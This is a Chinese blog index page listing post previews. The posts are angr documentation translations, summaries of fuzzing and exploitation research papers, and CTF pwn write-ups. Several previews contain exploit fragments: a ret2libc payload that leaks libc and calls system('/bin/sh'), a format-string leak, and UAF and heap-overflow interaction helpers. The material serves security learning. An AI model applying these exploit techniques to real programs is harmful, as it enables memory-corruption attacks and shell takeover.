自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(17)
  • 资源 (1)
  • 收藏
  • 关注

原创 angr翻译目录

angr目录Top Level InterfacesLoading a BinarySolver EngineProgram StateSimulation ManagersExecution Engines

2019-06-20 14:41:49 222

翻译 Angora: Efficient Fuzzing by Principled Search

摘要主要目标:在不用符号执行的情况下求解路径约束。引入技术:可扩展的字节级污点跟踪,上下文敏感的分支计数,基于梯度下降的搜索,输入长度探测。测试:LAVA-M,file,jhead,nm,objdump,size。1 介绍使用符号执行:klee,mayhem[5,8],许多约束无法求解:符号执行综述[6]避免符号执行及其他大开销的程序分析技术:AFL[1],覆盖范围反馈。开销低,却导致...

2019-12-02 11:06:58 827

翻译 HEAPHOPPER: Bringing Bounded Model Checking to Heap Implementation Security

摘要堆元数据攻击已经成为攻击者利用内存损坏漏洞的主要方式之一。尽管堆实施开发者已经引入预防和检查崩溃的错书,攻击者仍然能围绕它们做一些事情。在某种程度上,这是因为这些预防措施没有一个原理基础,这导致它在很多时候复杂而低效。在本文中,我们提出HEAPHOPPER,一个自动化的方式,基于模型检测和符号执行,来分析内存损坏情况下的堆利用实现。使用HEAPHOPPER,我们能够对不同的广泛的堆实施进行...

2019-11-30 08:32:32 285

翻译 KEPLER: Facilitating Control-flow Hijacking Primitive Evaluation for Linux Kernel Vulnerabilities

Abstract自动利用的挑战:将一个可利用的状态与一个rop链相连。控制流劫持是一个方案。困境:普遍的利用缓解技术,利用路径上的陷阱和不适宜的原语,导致手工生成linux内核利用原语都很困难。成果:提出KEPLER来生成一个单发的利用链来帮助利用生成。具体:接受一个控制流劫持原语作为输入,符号化地缝合一些流行内核编码风格和相应片段以生成ROP载荷。实验:通过比较先前地自动利用生成技术和...

2019-11-30 08:30:55 269

翻译 libdft: Practical Dynamic Data Flow Tracking for Commodity Systems

Abstract背景:动态数据流跟踪技术标记并跟踪感兴趣的数据在程序执行过程中的传播过程。现状:DFT已经被许多用于不同目的的工具反复实施多次,包括防止0day漏洞和跨站脚本攻击,检查和防止信息泄露,分析合法和恶意的软件。结果:我们提出libdft,一个动态DFT框架,与之前不同,libdft高效且可以重用,并适用于各种商用软件和硬件。libdft提供了建立DFT工具的API,促进研究。我...

2019-11-30 08:29:48 427

翻译 MOPT: Optimized Mutation Scheduling for Fuzzers

摘要背景:基于变异的fuzz是最流行的漏洞发现解决方案之一,它的效果很大程度上基于变异策略。问题:现有的fuzzer遵循一个特定的分布来选择变异算子,这在一般程序中发现漏洞的效率较低。结果:提出一种新的变异调度策略MOPT,让基于编译的fuzzer更有效率地发现漏洞。实施:MOPT使用一个定制的粒子群优化(PSO)算法求出关于模糊测试效率的算子的最优选择概率分布,并提供一种pacemake...

2019-11-30 08:27:11 745

翻译 Angr:Execution Engines

原文链接:https://docs.angr.io/core-concepts/simulation

2019-06-19 22:11:43 151

翻译 Angr:Simulation Managers

原文链接:https://docs.angr.io/core-concepts/pathgroups

2019-06-19 22:10:35 625

翻译 Angr:Program State

https://docs.angr.io/core-concepts/states

2019-06-19 22:08:53 725

翻译 Angr:Solver Engine

原文链接:https://docs.angr.io/core-concepts/solver

2019-06-19 22:08:05 390

翻译 Angr:Loading a Binary

原文链接:https://docs.angr.io/core-concepts/toplevel在此之前,您只看到了angr加载工具最简单的功能—您加载/bin/true,然后在没有共享库的情况下再次加载它。你也看到了proj.loader和一些它能做的事情。现在,我们将深入研究这些接口的细微差别以及它们可以告诉您的东西。我们简要介绍了angr的二元加载元件CLE。CLE代表"CLE Loa...

2019-06-19 22:01:56 395

翻译 Angr:Top Level Interfaces

原文链接:https://docs.angr.io/core-concepts/toplevel在开始学习angr之前,您需要对一些基本的angr概念以及如何构造一些基本的angr对象有一个基本的了解。我们将通过认识在您加载了二进制文件之后,您可以直接使用哪些功能来探究这个问题!使用angr的第一个操作总是将二进制文件加载到项目中。我们将使用/bin/true程序来做示例。>>...

2019-06-18 14:09:24 238

原创 w4-5

漏洞:栈溢出exp:1、用write泄露libc2、system("/bin/sh")# write(1,got_write,4) back to 0x08048460payload = 140*"a"+p32(elf.plt["write"])+p32(0x08048460)payload += p32(1) + p32(elf.got["write"]) + p32(4)p.se...

2019-05-31 15:14:06 145

原创 w4-4

漏洞:delete指针未清0,产生UAF。基本功能Keep secret①small②big③hugeWipe secretRenew secret交互def add(index, content): p.recvuntil("Renew secret\n") p.sendline("1") p.recvuntil("\n") p.sendline(...

2019-05-30 21:58:59 177

原创 w4-3

漏洞:格式化字符串%p泄露%n任意地址写exp1p.recvuntil("username")p.sendline("xx")p.recvuntil("Input your password")# 泄露偏移6处的内容p.sendline("%6$p")p.recvuntil(">")p.sendline("1")p.recvuntil("xx\n")x = p.recv...

2019-05-30 21:03:25 97

原创 w4-2

漏洞:delete时没有把指针置零,可以UAF。基本功能:New PostEdit a PostDelete a PostShow all PostsI want to post a lonely hearts ad!!!Exit交互def add(index, data): io.recvuntil('Your Choice:') io.sendline(s...

2019-05-30 10:58:16 152

原创 w4-1

漏洞:create和edit都没有检查长度,产生堆溢出。基本功能:create notesdisplay notesdelete notesmodify notesexit交互def create(size,content): p.recvuntil("5. exit\n") p.sendline("1") p.recvuntil("Please enter the si...

2019-05-27 23:26:48 600

w4-1程序与脚本.zip

def create(size,content): p.recvuntil("5. exit\n") p.sendline("1") p.recvuntil("Please enter the size of note : ") p.sendline(str(size)) p.recvuntil("Please enter the note : ") p.sendline(content) def display(index): p.recvuntil("5. exit\n") p.sendline("2") p.recvuntil("Please input index : ") p.sendline(str(index)) p.recvuntil("Notes are : ") return p.recvline() def delete(index): p.recvuntil("5. exit\n") p.sendline("3") p.recvuntil("Please input index : ") p.sendline(str(index)) def modify(index,content): p.recvuntil("5. exit\n") p.sendline("4") p.recvuntil("Please input index : ") p.sendline(str(index)) p.recvuntil("Please enter the note : ") p.sendline(content)

2019-05-28

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除